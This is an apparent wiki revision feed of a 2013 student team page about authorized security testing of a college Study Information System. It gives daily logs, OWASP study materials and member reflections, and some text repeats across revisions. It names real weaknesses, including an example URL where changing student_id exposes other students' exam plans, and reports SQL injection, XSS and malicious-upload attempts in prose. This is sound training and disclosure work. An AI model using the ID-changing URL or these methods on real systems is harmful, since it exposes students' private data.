* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] &#039;&#039;(Made by whole team, structure by Sandra and Jurij)&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] &#039;&#039;(Team Security starts from 18:30)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** Googeled a lot&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feed-back==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62375</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62375"/>
		<updated>2013-04-05T06:20:45Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Mika Salmela */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
